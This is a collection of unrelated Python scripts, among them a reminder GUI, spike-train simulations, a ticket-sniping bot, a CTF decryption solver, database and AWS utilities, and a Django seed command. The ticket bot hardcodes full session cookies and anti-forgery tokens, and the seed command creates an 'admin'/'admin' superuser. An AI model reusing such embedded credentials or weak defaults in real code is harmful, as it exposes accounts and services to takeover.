    #message2='Current Snooze time={0} seconds'.format(snooze_time)
    #message3 = 'Do you want more reminders?'
    # cycle through exercise images; NOTE(review): image_list has 6
    # entries but % 5 only ever selects the first five.
    i=execution_count % 5
    ttk.Label(win, text=message1).grid(column=0, row=0)
    ttk.Label(win,image=image_list[i]).grid(row=1,column=0,columnspan=2)
    #ttk.Label(win, text=message2).grid(column=0, row=1)
    #ttk.Label(win, text=message3).grid(column=0, row=2)
    #Label(mainFrame, text="Take a break!!",
    # font = font.Font(family="Times", size=12),
    # padx=20, pady=10, wraplength=300)
    #text.pack(fill=BOTH, expand=1)
    #yes_btn = ttk.Button(win, text='Sure', command=lambda: eye_action(win, True))
    #yes_btn.grid(column=0,row=3)
    ttk.Button(win, text='Dismiss', command=lambda: eye_action(win, False)).grid(column=1, row=3)
    #yes_btn.focus()
    win.lift()
    win.attributes('-topmost', True)
    # auto-snooze: after 5 s behave as if the user asked for another reminder
    win.after(5000, lambda:eye_action(win, True))
#im1=Image.open("C:/Users/Arpit/Desktop/imagefolder/p1.png")
#im2=Image.open("C:/Users/Arpit/Desktop/imagefolder/p2.png")
#im3=Image.open("C:/Users/Arpit/Desktop/imagefolder/p3.png")
#im4=Image.open("C:/Users/Arpit/Desktop/imagefolder/p4.png")
#im5=Image.open("C:/Users/Arpit/Desktop/imagefolder/p5.png")
#im6=Image.open("C:/Users/Arpit/Desktop/imagefolder/p6.png")
# list of reminders: load whatever saveReminder() wrote earlier
with open(REM_FILE, 'r') as f:
    updated_reminders = json.loads(f.read())
# merge new records into ``a`` (a list defined above this chunk --
# TODO confirm); membership test avoids duplicates
for ab in updated_reminders:
    if ab not in a:
        a.append(ab)
#print('\n\nThanks! You will get your first reminder in {0} seconds'.format(snooze_time))
# NOTE(review): the lines below appear to use only the *last* record
# iterated above (``ab`` leaks out of the loop) -- verify intent.
t_pom = ab[0] *60 #ab[4]
snooze_time=t_pom
# current hour and minute
cur_hrs = int(t_pom/3600)
minutes=t_pom-cur_hrs*60*60
cur_mins = int(minutes/60)
# find reminders to show
#for ab in a:
# rem_hrs = dt.datetime.now().hour
# rem_mins = dt.datetime.now().minute
# if cur_hrs == rem_hrs and cur_mins == rem_mins:
# show reminder window
# REMINDER(a)
# hidden root window hosts the Toplevel reminder windows
root = Tk()
root.withdraw()
execution_count = 0
#image_num=-1
# PhotoImage objects must be created after Tk() and kept referenced,
# or Tk garbage-collects the image data
my_img1=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p1.png"))
my_img2=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p2.png"))
my_img3=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p3.png"))
my_img4=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p4.png"))
my_img5=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p5.png"))
my_img6=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p6.png"))
image_list=[my_img1,my_img2,my_img3,my_img4,my_img5,my_img6]
#if dt.datetime.now().hour<ab[2] and dt.datetime.now().minute<ab[3]:
# if dt.datetime.now().hour>ab[0] and dt.datetime.now().minute>ab[1]:
EyeReminderWindow()
#my_label=Label(image=my_img1)
#my_label.grid(row=2,column=2,columnspan=3)
root.mainloop()
print('Exiting, bye')
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 7 13:25:55 2019
@author: kblackw1
"""
import numpy as np
import spike_train_utils as stu
import sig_filter as filt
from matplotlib import pyplot as plt
ms_per_sec=1000
numbins=100 #number of bins for histogram
binwidth=0.002 #adjust so histogram looks good
########################### parameters related to spike train generation
max_time=5 #sec #20
min_isi=0.002
#these should go in dictionary?
ramp_start=2
ramp_duration=0.5 #fast ~0.3, slow ~0.5
pulse_start=[2,2.2]
pulse_duration=0.10
# NOTE: the second assignment overrides the first, so only the STN
# 'pulse' trains are actually saved.
save_spikes={'Ctx': ['exp','osc'], 'STN': ['pulse']}
save_spikes={'STN': ['pulse']}
#save_spikes={} #if empty, will not save data
cell_type_dict={}
#isi, interburst and intraburst units are seconds
#interburst: interval between bursts; 1/interburst is frequency used for sinusoidally varying spike trains
#freq_dependence is fraction of mean_isi modulated sinusoidally, [0,1.0), but > 0.9 doesn't work with min_isi=2 ms
#noise used in burst train generation
#cell_type_dict['str']={'num_cells':100,'mean_isi': 1.0/4.1,'interburst': 1/0.2,'intraburst': 0.19,'noise':0.005,'freq_dependence':0.95}
#cell_type_dict['GPe']={'num_cells':35,'mean_isi': 1/29.3,'interburst': 0.5,'intraburst': 0.027,'noise':0.005,'freq_dependence':0.95}
# only STN is enabled; the other cell types remain commented out
cell_type_dict['STN']={'num_cells':500,'mean_isi': 1,'interburst': 1.5,'intraburst': 0.025,'noise':0.005,'freq_dependence':0.95,'max_freq':56}
#cell_type_dict['Ctx']={'num_cells':10000,'mean_isi': 1/5.,'interburst': 1.5,'intraburst': 0.044,'noise':0.005,'freq_dependence':0.95,'max_freq':30}
#using intraburst of 0.015 gives mean isi too small and mean freq too high!
#cell_type_dict['GPe']={'num_cells':35,'mean_isi': 1/29.3,'interburst': 1/20.,'intraburst': 0.015,'noise':0.005,'freq_dependence':0.5}
#cell_type_dict['STN']={'num_cells':200,'mean_isi': 1/18.,'interburst': 1/20.,'intraburst': 0.015,'noise':0.005,'freq_dependence':0.5}
########### Burst gives different number of spikes. What is relation among mean isi,interburst and intraburst
#to produce similar number of spikes for burst, need intraburst=0.8/freq
#theta frequencies for creating doubly oscillatory trains
DMfreq=10.5 #carrier,interburst=0.555Hz
DLfreq=5.0 #carrier,interburst=0.2Hz
thetafreq=0#DLfreq
#str values:
#mean_isi of 1/2.1 from?
#intratrain isi from KitaFrontSynapticNeurosci5-42
#intraburst: 0.01 is mode from KitaFrontSynapticNeurosci5-42, 0.02 is fastest observed str firing frequency,
#GPe values:
#mean_isi from KitaFrontSynapticNeurosci5-42
#interburst is guestimate; intraburst is mode from KitaFrontSynapticNeurosci5-42
#STN values:
#mean_isi from WilsonNeurosci198-54, mean freq is 18-28
#intraburst: same as GPe until find better estimate
#str interburst of 4.6 sec gives ~0.22 Hz, STN interburst of 1.5 --> 0.66 Hz, GPe interburst of 0.5 sec --> 2 Hz
#which method I think is better
best_method={'str': 'exp', 'GPe':'lognorm','STN':'lognorm','Ctx':'exp'}
# Generate spike trains for every configured cell type with several
# methods, then either save selected trains to .npz (save_spikes set)
# or plot ISI histograms, time histograms, FFTs and rasters.
for cell_type,params in cell_type_dict.items():
    info={} #dictionary for storing min,max,mean of ISI and CV
    ISI={}; hists={}
    spikes={}
    time_samp={};tdep_rate={} #for Inhomogenous Poisson methods
    print ('##################',cell_type,'#################')
    #spikesPoisson, info['poisson'],ISI['poisson']=stu.spikes_poisson(params['num_cells'],params['mean_isi'],min_isi,max_time)
    #spikesNormal, info['norm'],ISI['norm']=stu.spikes_normal(params['num_cells'],params['mean_isi'],min_isi,max_time)
    # stationary methods: exponential and lognormal ISI distributions
    spikes['exp'], info['exp'],ISI['exp']=stu.spikes_exp(params['num_cells'],params['mean_isi'],min_isi,max_time)
    spikes['lognorm'], info['lognorm'],ISI['lognorm']=stu.spikes_lognorm(params['num_cells'],params['mean_isi'],min_isi,max_time,params['intraburst'])
    '''spikes['Burst']=[sorted(np.hstack(stu.train(cell,params['mean_isi'],float(max_time)/params['num_cells'],params['intraburst'],min_isi,max_time,params['noise'])))
    for cell in range(params['num_cells'])]
    ISI['burst'],CV_burst,info['burst']=stu.summary(spikesBurst,max_time,'burst')
    spikes['Burst2']=[sorted(np.hstack(stu.train(cell,params['mean_isi'],params['interburst'],params['intraburst'],min_isi,max_time,params['noise'])))
    for cell in range(params['num_cells'])]
    ISI['burst2'],CV_burst2,info['burst2']=stu.summary(spikesBurst2,max_time,method='burst2')
    '''
    # inhomogeneous-Poisson methods additionally return the sampled
    # time axis and the time-dependent firing rate
    spikes['osc'],info['osc'],ISI['osc'],time_samp['osc'],tdep_rate['osc']=stu.osc(params['num_cells'],params['mean_isi'],min_isi,max_time,params['intraburst'],params['interburst'],params['freq_dependence'])
    spikes['ramp'],info['ramp'],ISI['ramp'],time_samp['ramp'],tdep_rate['ramp']=stu.spikes_ramp(params['num_cells'],min_isi,max_time,1/params['mean_isi'],params['max_freq'],ramp_start,ramp_duration)
    spikes['pulse'],info['pulse'],ISI['pulse'],time_samp['pulse'],tdep_rate['pulse']=stu.spikes_pulse(params['num_cells'],min_isi,max_time,1/params['mean_isi'],params['max_freq'],pulse_start,pulse_duration)
    #
    ####################################################################
    ###### Plotting and output
    ####################################################################
    #
    if len(save_spikes):
        # save mode: write the selected trains to .npz and skip plotting
        for method in save_spikes[cell_type]:
            fname=cell_type+str(cell_type_dict[cell_type]['num_cells'])+'_'+method+'_freq'+str(np.round(1/params['mean_isi']))
            if method=='osc':
                fname=fname+'_osc'+str(np.round(1.0/params['interburst'],1))
                if thetafreq:
                    fname=fname+'_theta'+str(np.round(thetafreq))
            if method=='ramp':
                fname=fname+'_'+str(params['max_freq'])+'dur'+str(ramp_duration)
            if method=='pulse':
                fname=fname+'_'+str(params['max_freq'])+'dur'+str(pulse_duration)
            print('saving data to', fname)
            np.savez(fname+'.npz', spikeTime=spikes[method], info=info[method])
    else:
        ################# histogram of ISIs ########################3
        # log-spaced ISI bins spanning the global min..max over methods
        min_max=[np.min([info[key]['min'] for key in info.keys()]),
            np.max([info[key]['max'] for key in info.keys()])]
        bins=10 ** np.linspace(np.log10(min_max[0]), np.log10(min_max[1]), numbins)
        bins_IP={};hist_dt={};time_hist={}
        for ip_type in tdep_rate.keys():
            bins_IP[ip_type]=list(time_samp[ip_type])+[max_time]
            hist_dt[ip_type]=np.diff(time_samp[ip_type])[0]
        for method in spikes.keys():
            hists[method],tmp=np.histogram(stu.flatten(ISI[method]),bins=bins,range=min_max)
        #recalculate histogram for inhomogeneous Poisson
        for ip_type in tdep_rate.keys():
            time_hist[ip_type],tmp=np.histogram(stu.flatten(spikes[ip_type]),bins=bins_IP[ip_type])
        #
        ########## plot Inhomogeneous Poisson, and also fft
        ###### Extract low frequency envelope of signal, only if theta
        for ip_type in tdep_rate.keys():
            plot_bins=[(bins_IP[ip_type][i]+bins_IP[ip_type][i+1])/2 for i in range(len(bins_IP[ip_type])-1)]
            plt.ion()
            plt.figure()
            plt.title(cell_type+' time histogram of '+ ip_type)
            plt.bar(plot_bins,time_hist[ip_type],width=hist_dt[ip_type],label='hist')
            plt.plot(time_samp[ip_type],np.max(time_hist[ip_type])*tdep_rate[ip_type]/np.max(tdep_rate[ip_type]),'r',label='tdep_rate')
            if thetafreq and ip_type=='osc':
                data=time_hist['osc']#tdep_rate
                meandata=np.mean(data)
                newdata=np.abs(data-meandata)
                fft_env=np.fft.rfft(newdata)
                cutoff=3
                # NOTE(review): time_samp is a dict keyed by method name,
                # so time_samp[1] raises KeyError -- time_samp[ip_type][1]
                # was probably intended.  Currently dead code (thetafreq=0).
                fft_lowpas=filt.butter_lowpass_filter(fft_env, cutoff, 1/time_samp[1], order=6)
                plt.plot(time_samp[ip_type],newdata,'k',label='norm hist')
            plt.xlabel('time (sec)')
            plt.ylabel('num spikes')
            plt.legend()
            if ip_type=='osc':
                #plot FFT of histogram
                plt.figure()
                plt.title(cell_type+' fft of time histogram of IP: '+ip_type)
                fft_IP=np.fft.rfft(time_hist[ip_type])
                xf = np.linspace(0.0, 1.0/(2.0*bins_IP[ip_type][1]), len(fft_IP))
                plt.plot(xf[1:],2/len(fft_IP)*np.abs(fft_IP[1:]),label='fft')
                if thetafreq:
                    plt.plot(xf[1:],2/len(fft_lowpas)*np.abs(fft_lowpas[1:]),label='lowpass')
                plt.legend()
        ######### plot raster and histogram for other spike trains
        colors=plt.get_cmap('viridis')
        #colors=plt.get_cmap('gist_heat')
        # one colormap entry per cell for the raster plot
        color_num=[int(cellnum*(colors.N/params['num_cells'])) for cellnum in range(params['num_cells'])]
        color_set=np.array([colors.__call__(color) for color in color_num])
        for labl,spike_set in spikes.items():
            plt.figure()
            plt.title(cell_type+' '+labl+' raster'+' mean '+str(np.round(info[labl]['mean'],3))+', median '+str(np.round(info[labl]['median'],3)))
            #for i in range(params['num_cells']):
            plt.eventplot(spike_set,color=color_set)#[i],lineoffsets=i)
            plt.xlim([0,max_time])
            plt.xlabel('Time (sec)')
            plt.ylabel('neuron')
        #
        #plt.figure()
        #plt.title('histogram')
        color_num=[int(histnum*(colors.N/len(hists))) for histnum in range(len(hists))]
        plot_bins=[(bins[i]+bins[i+1])/2 for i in range(len(bins)-1)]
        flat_hist=stu.flatten([hists[labl] for labl in spikes.keys()])
        # NOTE(review): the second assignment overrides the first ymax;
        # ymax is only used by the commented-out ylim call anyway.
        ymax=np.max(flat_hist)
        ymax=np.mean(flat_hist)+1*np.std(flat_hist)
        xmax=5*np.max([info[t]['median'] for t in spikes.keys()])
        plt.figure()
        plt.title(cell_type+' '+' histogram')
        for i,labl in enumerate(spikes.keys()):
            plt.bar(np.array(plot_bins)+binwidth*0.1*i,hists[labl], label=labl+' '+str(np.round(1/info[labl]['mean'],1))+' hz '+str(np.round(1/info[labl]['median'],1))+' hz',color=colors.__call__(color_num[i]),width=binwidth)
        plt.xlim([0,xmax])
        #plt.ylim([0,ymax])
        plt.xlabel('ISI')
        plt.ylabel('num events')
        #plt.xticks(plot_bins)
        #plt.xscale('log')
        plt.legend()
|
from distribution_pty.exponential import expon
from distribution_pty.lognormal import lognorm
from distribution_pty.pareto import pareto
from distribution_pty.gpd import genpareto |
# -*- coding: utf-8 -*-
import urllib,urllib2
import json
import time,datetime
def check_ticket(myurl,myheaders):
    """GET *myurl* with *myheaders* and return the raw response body."""
    request = urllib2.Request(myurl, headers=myheaders)
    return urllib2.urlopen(request).read()
def buy_ticket(myurl,mydata,myheaders):
    """POST the url-encoded *mydata* to *myurl* and return the response body."""
    request = urllib2.Request(myurl, data=urllib.urlencode(mydata), headers=myheaders)
    return urllib2.urlopen(request).read()
def display_datetime():
    """Return the current local time formatted as 'YYYY-MM-DD HH:MM:SS'."""
    return '{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())
#Custom Params
# NOTE: Python 2 script (print statements, urllib2); input() here
# evaluates the typed text, so ticket_id/seat_type become ints.
ticket_id = input("Input ticket id:\n")
#seat_type: VIP[2], regular ticket[3], standing ticket[4]
seat_type = input("Input ticket type:\n")
brand_id = '1'
#cookie = 'route=72b22cfe13b6559dd934c0716c55a35b; .AspNet.ApplicationCookie=bF0E6lzNJh37oX6M2Lwe-zjSUUtm21L7QXJPM8ikLCUihaZ0aK2XRDQJJrmVTyM6PI1yq76UkSjWY_tSqID1_PCl96O9kcNJUQTbcDo67buFZNO_eL1jItDcL9njlc8mwqh-Sul-Ixq38fjV0UEm74wObQNqxoC03M9YKCIjj7Fz5sKb7m48donx3MoMkmsxxiUoVzN1pzPSK1_eRf2DXmXzsRoVWIcI_CJVpZFwvZpKAMJmUeH1wodnuBBywleYPFfgMs41GrPCznoeNXnDW9Y8CYjcaokApyJdoIiaOlPUdewfnC1u__4A4Y5EBSRN_wTzXNec1Arz43OtSTledSmxabSNAoYbv1qgVaZmITlM5nGUu3ypvVDb5Ah6xvBOReC9WZ3foK8vaVql0_xvyYVhDNsxdPexeXCrmmQzIT5rw2RX3EH4UPqYpFFP-Klde0LON48Q5tzxokWlsjUXpSBqXQ-W9x_yy3wIGvKSoFpYoziU08UYkZL_Qn4b8Fv8i1gmhKeqhUTIfkHZ8tALiGvNCcc3NYIExUR4aR8Xvw4; __RequestVerificationToken=fD722Rj85TcflM2_8L7ZGlKIzJcWHKUlGRGMjbanzM0L5jAFd_7ZbAex8hwlzFIcQXgSxay5tKeF0ruPqOa6Z_wiQUASb2eDKveraHquTdM1'
# session cookie copied from a logged-in browser session
cookie = 'route=72b22cfe13b6559dd934c0716c55a35b; __RequestVerificationToken=NlPT3xclFnRPjvvaA3H69tDT9QCW3iLXB5r7FnSzqwdbQ--GGMAsL4eQsoSspntlekJL3tV9qUIfjIuNKatRHhlOgHeLQV6gX-XQW0BIJDM1; .AspNet.ApplicationCookie=dgQ9YiHYDQg5mEsuVFTviIbD_pWilSo8jBVU_AzB6q4Yr-wB4ShkpTPgXUVeFsI76AO_q_N3mNs5PZbDBNQ3dQSLJL-Ss-0orptD-RZ_7AMA_DE61Jp7I4EsJN1s5pA7rBHak-39Unt6aga04bfJsneYyFgneD_c9k0MIMCC1iDtC1HKqMxXSuLuDfr5XbpJAcK-IIcvONbR_1UsvPY_Zig9AQiCZTTLern4DpOgbqy4wAfFHfrjutgKocqa9Rm5XKuWJ3J00jFh-l4HhI46Jac-gYQjJdu1h9ZCIWAo_sTwJ4muja1QRxiMPSx8OF71WZgVntASpZ4qxKqIXIzfTAnJcsiNFJnirIlGhf6edz7K0bDY8XoPudBZgO_G9YXv3ilGIfwHt4Uthg0N_frdx6bqRuuvK8_MW9mGHF41HeT0f3QGfenwJgEnKXxeQrb32rwhVX4WN6ZONS34iX06GVdRu8-ZlpFW1nXdNDVGtWO2NpzsatB-MHBYSBPi_x6kakj7Oy9G-TPosjP6qIl0AaMijO-QTAPypDo_k33m2BGnM3VYzAFD6RV0FYOxR8NMQTi613QakYV8cw_EPDjCt2czite0Ti2xytD_iyVXXqZiDUbunLRBRahqTIZYEFZI'
#Define Params
checkid_url = 'http://shop.48.cn/home/GetUserWarnOnSale'
check_url = 'http://shop.48.cn/tickets/saleList?id=' + str(ticket_id) + '&brand_id=' + brand_id
send_headers = {
    'Cookie':cookie,
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36'
}
buy_url = 'http://shop.48.cn/TOrder/add'
buy_data = { 'id':str(ticket_id),'num':'1','seattype':str(seat_type),'brand_id':brand_id }
# index into the saleList JSON array for the chosen seat type
ticket_index = seat_type - 1
#Check ID
print check_ticket(checkid_url,send_headers)
#Check&Buy: poll once per second until the seat becomes available,
#then place the order and stop
while True:
    check_html = check_ticket(check_url,send_headers)
    check_jsondata = json.loads(check_html)
    if check_jsondata[ticket_index]['amount'] == 1:
        buy_html = buy_ticket(buy_url,buy_data,send_headers)
        print display_datetime() + ' Result:Tickets Buy Done; Tickets Amount ' + str(check_jsondata[ticket_index]['amount'])
        print buy_html
        break
    else:
        print display_datetime() + ' Result:Tickets Amount '+ str(check_jsondata[ticket_index]['amount'])
        #print check_jsondata[ticket_index]
        time.sleep(1)
|
from pygame.sound import *
# ``echo`` is expected to come from the star import above --
# TODO confirm pygame.sound actually exports an ``echo`` object.
echo.test_echo()
|
import sys
from pprint import pprint
import logging
import keyring
from microstrategy_api.task_proc.document import Document
from microstrategy_api.task_proc.task_proc import TaskProc
base_url = 'https://my_hostname/MicroStrategy/asp/TaskProc.aspx?'
def run_document(task_api_client, document_guid, prompt_answers_by_attr=None):
    """Execute a MicroStrategy document, answering its element prompts.

    Args:
        task_api_client: connected TaskProc client.
        document_guid: GUID of the document to run.
        prompt_answers_by_attr: optional mapping of attribute GUID ->
            list of element answers.  Prompts whose attribute GUID is
            not in the mapping are answered with an empty list.

    Returns:
        Whatever Document.execute() returns for the answered prompts.
    """
    log = logging.getLogger(__name__+'.run_document')
    log.setLevel(logging.DEBUG)
    # Fix: the document and its prompts were fetched twice in a row
    # (copy/paste duplication) -- one round trip is enough.
    doc = Document(task_api_client, guid=document_guid)
    prompts = doc.get_prompts()
    log.info("prompts:")
    log.info(prompts)
    prompt_answers = dict()
    if prompt_answers_by_attr is not None:
        for prompt in prompts:
            if prompt.attribute.guid in prompt_answers_by_attr:
                prompt_answers[prompt] = prompt_answers_by_attr[prompt.attribute.guid]
                log.debug("Prompt {} answer = {}".format(prompt, prompt_answers_by_attr[prompt.attribute.guid]))
            else:
                # unanswered prompts get an explicit empty answer
                prompt_answers[prompt] = []
                log.debug("Prompt {} answer = None".format(prompt))
    results = doc.execute(element_prompt_answers=prompt_answers)
    log.info("Document Done")
    return results
if __name__ == '__main__':
    logging.basicConfig()
    log = logging.getLogger(__name__)
    log.setLevel(logging.DEBUG)
    user_name = 'Administrator'
    # credential comes from the OS keyring, not from source control
    password = keyring.get_password('Development', user_name)
    server = 'my_server'
    project_name = 'my_project'
    # attribute GUID for the Organisation Unit prompt
    OU_GUID = '7039371C4B5CC07DC6682D9C0EC8F45C'
    task_api_client = TaskProc(
        base_url=base_url,
        server=server,
        project_name=project_name,
        username=user_name,
        password=password,
    )
    results = run_document(
        task_api_client,
        # document_guid='6AF9511C4AB4A76635DBEDB98E3859D8',
        document_guid='084536174A598B380CD33684232BB59C',
        prompt_answers_by_attr={OU_GUID: ['FETQ6OmnsKB']},
    )
    # NOTE(review): pprint() prints to stdout and returns None, so this
    # logs "None"; pprint.pformat(results) was probably intended.
    log.debug(pprint(results))
    log.info("Logging out")
    task_api_client.logout()
|
#!/usr/bin/python
'''
Implemented by Aaditya Purani (@aaditya_purani)
There are three functions calling each both are encryption routine.
First function has in-memory array written in inline assembly
In zMx function, it takes plain-text as input checks block.number == 12
Encryption routine in zMx utilizes it and performs calculation along with memory arr
Output is passed to Crp function, which has custom rot-19 implementation
then it is feeded into aXeJ which takes input as bytes and perform require check with seed owner sets
As this is static bytecode, seed cannot be retrieved from bytecode. So we want players to brute seed given sha1 hash & requirements
seed should be exactly 4 length which is given out in one require(bytes(seed).length == 4); checks
Then implement xor checks for aXeJ function
Now, to decrypt implement in reverse given below
'''
# NOTE: Python 2 script (xrange, print statement).
cipher = "tphzqh}v}uivyznwju" # Provided in message.txt
len_cipher = len(cipher)
offset = len_cipher - 2
cipher = list(cipher)
seed = "bcmz" # Must be retrieved by bruteforce of SHA-1 Hash provided in bytecode 4d64752cadde6ea019757e09ce374aa1bdba81df
# undo the two seed-dependent XOR mixes applied by the contract's aXeJ step
cipher[offset] = chr(ord(seed[0]) ^ ord(cipher[offset])^ ord(cipher[offset-2]))
cipher[offset-4] = chr(ord(seed[2]) ^ ord(cipher[offset-4]) ^ ord(cipher[offset-8]))
arr_num = [2, 24, 13, 17,8, 9, 10, 5, 3, 7] # Must be retrieved carefully from memory array
# block.number value the contract requires (see zMx description above)
blk_num = 12
# reverse the per-character XOR with the rotating memory array and the
# constant 12 (the blk_num check value)
for i in xrange(0, len_cipher):
    cipher[i] = chr((ord(cipher[i])^arr_num[(i+3)%10])^(12))
print "".join(cipher)
# Use the rotcustom.sol to decrypt it further
# Use the rotcustom.sol to decrypt it further |
# -*- coding: utf-8 -*-
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import *
import datetime, os
current_db_rev = 4
Base = declarative_base()
class Record(Base):
    """A stored upload record: creation date, description and file name."""
    __tablename__ = 'records'
    id = Column( Integer, primary_key=True,index=True )
    date = Column( DateTime )
    description = Column( Text )
    filename = Column( String(255) )
    def __init__(self):
        # stamp the record with its creation time
        self.date = datetime.datetime.now()
    def basename(self):
        """Return the stored file name without its directory part."""
        return os.path.basename( self.filename )
class InfoLog(Base):
    """Infolog data parsed from a Record's file (schema still minimal)."""
    __tablename__ = 'infologs'
    id = Column( Integer, primary_key=True,index=True )
    spring_version = Column( String(100) )
    record_id = Column( Integer, ForeignKey( Record.id ) )
    #and so forth
class DbConfig(Base):
    """Configuration table holding the database schema revision number."""
    __tablename__ = 'config'
    dbrevision = Column( Integer, primary_key=True )
    def __init__(self):
        # fresh databases start at revision 1
        self.dbrevision = 1
class ElementExistsException( Exception ):
    """Raised when an element being inserted is already present in the db."""

    def __init__(self, element):
        self.element = element

    def __str__(self):
        return "Element {} already exists in db".format(self.element)
class ElementNotFoundException( Exception ):
    """Raised when a requested element does not exist in the db."""

    def __init__(self, element):
        self.element = element

    def __str__(self):
        return "Element {} not found in db".format(self.element)
class DbConnectionLostException( Exception ):
    """Raised when the db connection drops mid-query; keeps the traceback."""

    def __init__( self, trace ):
        self.trace = trace

    def __str__(self):
        return "Database connection temporarily lost during query"

    def getTrace(self):
        """Return the traceback captured when the connection was lost."""
        return self.trace
class Backend:
    """Database access layer: connects, migrates the schema and stores records."""

    def Connect(self):
        """Create the engine, create all mapped tables and prepare sessions."""
        self.engine = create_engine(self.alchemy_uri, echo=self.verbose)
        self.metadata = Base.metadata
        self.metadata.bind = self.engine
        self.metadata.create_all(self.engine)
        self.sessionmaker = sessionmaker( bind=self.engine )

    def __init__(self,alchemy_uri,verbose=False):
        """Connect to *alchemy_uri* and bring the schema up to current_db_rev."""
        global current_db_rev
        self.alchemy_uri = alchemy_uri
        self.verbose = verbose
        self.Connect()
        oldrev = self.GetDBRevision()
        self.UpdateDBScheme( oldrev, current_db_rev )
        self.SetDBRevision( current_db_rev )

    def UpdateDBScheme( self, oldrev, current_db_rev ):
        """Migrate the schema from *oldrev* to *current_db_rev* (no-op for now)."""
        pass

    def GetDBRevision(self):
        """Return the highest stored db revision, or -1 when none is stored."""
        session = self.sessionmaker()
        rev = session.query( DbConfig.dbrevision ).order_by( DbConfig.dbrevision.desc() ).first()
        if not rev:
            #default value
            rev = -1
        else:
            rev = rev[0]
        session.close()
        return rev

    def SetDBRevision(self,rev):
        """Persist *rev* as the db revision, creating the config row if needed."""
        session = self.sessionmaker()
        conf = session.query( DbConfig ).first()
        if not conf:
            #default value
            conf = DbConfig()
        conf.dbrevision = rev
        session.add( conf )
        session.commit()
        session.close()

    def parseZipMembers(self, fn, fd_dict ):
        """Create a Record for file *fn* plus a (not yet parsed) InfoLog.

        ``fd_dict`` (presumably zip member name -> file object -- TODO
        confirm) is currently unused; actual infolog parsing is still
        to be implemented.  Returns the id of the new Record.
        """
        session = self.sessionmaker()
        record = Record()
        record.filename = fn
        session.add( record )
        session.commit()
        record_id = record.id
        infolog = InfoLog()
        infolog.record_id = record_id
        #for line in line_list:
        #if line.startswith('Spring'):
        #infolog.spring_version = line.replace('Spring','')
        #insert actual parsing here
        session.add( infolog )
        session.commit()
        session.close()
        # Fix: removed a stray Python-2 debug statement (print 'koko')
        # that wrote noise to stdout and broke Python-3 parsing.
        return record_id
import pygame
class Penguin():
    """The player sprite: owns its image and its on-screen position."""

    def __init__(self, screen):
        """Load the penguin image and place it in the middle of *screen*."""
        self.screen = screen
        # The sprite's rect tracks its position; the screen rect gives
        # the playfield bounds.
        self.image = pygame.image.load('images/penguin1.bmp')
        self.rect = self.image.get_rect()
        self.screen_rect = screen.get_rect()
        # Start each new penguin at the centre of the screen.
        self.rect.center = self.screen_rect.center

    def blitme(self):
        """Draw the penguin at its current rect position."""
        self.screen.blit(self.image, self.rect)
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from artists.models import Artist, Song
from django.contrib.auth.models import User
class Command(BaseCommand):
    """Management command that resets and seeds the demo database."""
    help = 'Imports initial data'

    def handle(self, *args, **options):
        """Wipe users, artists and songs, then recreate the fixtures."""
        # Start from a clean slate (same deletion order as before).
        for model in (User, Artist, Song):
            model.objects.all().delete()
        User.objects.create_superuser(
            username='admin', email='admin@example.com', password='admin')
        ARTISTS = [
            ('Stevland', 'Judkins', 'Stevie Wonders', 'https://upload.wikimedia.org/wikipedia/commons/thumb/5/54/Stevie_Wonder_1973.JPG/600px-Stevie_Wonder_1973.JPG', 90, 'rock'),
            ('James', 'Hendrix', 'Jimi Hendrix', 'https://upload.wikimedia.org/wikipedia/commons/a/ae/Jimi_Hendrix_1967.png', 80, 'rock'),
            ('Riley', 'King', 'B.B. King', 'https://upload.wikimedia.org/wikipedia/commons/thumb/9/97/B.B._King_in_2009.jpg/600px-B.B._King_in_2009.jpg', 75, 'blues'),
        ]
        # Each fixture row maps positionally onto these model fields.
        artist_fields = ('first_name', 'last_name', 'artistic_name',
                         'picture_url', 'popularity', 'genre')
        artists_ids = [
            Artist.objects.create(**dict(zip(artist_fields, row))).id
            for row in ARTISTS
        ]
        SONGS = [
            (artists_ids[0], 'Superstition', 'Talking book'),
            (artists_ids[0], 'Higher Ground', 'Innervisions'),
            (artists_ids[2], 'The Thrill Is Gone', 'Completely Well'),
        ]
        for song_row in SONGS:
            Song.objects.create(**dict(zip(('artist_id', 'title', 'album_name'), song_row)))
        print('Imported!')
|
#!/usr/bin/python2.7
#-*- coding: utf-8 -*-
import numpy as np
import math
import operator
# NOTE: Python 2 script (print statements).  Fixed-point iteration for
# p in  p = A + log10((r_21**p - s)/(r_32**p - s)) -- looks like an
# apparent-order / grid-convergence computation with refinement ratios
# r_21, r_32 (TODO confirm against the source of these constants).
A = 8.21985303
s = 1
r_21 = 1.126315789
r_32 = 1.39953271
epsilon = 1e-10  # convergence tolerance on |p1 - p2|
p1 = 1.0  # initial guess
for i in range(1,1000):
    p2 = A + math.log10((r_21**p1-s)/(r_32**p1-s))
    print 'p2:',p2
    if abs(p1-p2)<=epsilon:
        print 'solution is done. p=',p2
        print 'iteration number i=',i
        break
    p1 = p2
|
import boto3
import json
def get_mq_info():
    """Collect DescribeBroker output for every AmazonMQ broker in each
    region and print the result as a JSON document."""
    # Region names come from EC2's region listing.
    ec2 = boto3.client('ec2')
    region_names = [entry['RegionName'] for entry in ec2.describe_regions()['Regions']]
    broker_info = []
    for region in region_names:
        # These two regions are skipped, same as the original code
        # (presumably AmazonMQ unsupported there -- TODO confirm).
        if region in ('eu-north-1', 'sa-east-1'):
            continue
        mq = boto3.client('mq', region_name=region)
        # list_brokers gives us the ids we need for describe_broker
        broker_ids = [summary['BrokerId'] for summary in mq.list_brokers()['BrokerSummaries']]
        for broker_id in broker_ids:
            description = mq.describe_broker(BrokerId=broker_id)
            # Each description is wrapped in its own single-element list
            # to keep the original output structure intact.
            broker_info.append([description])
    # default=str stringifies datetimes and other non-JSON values
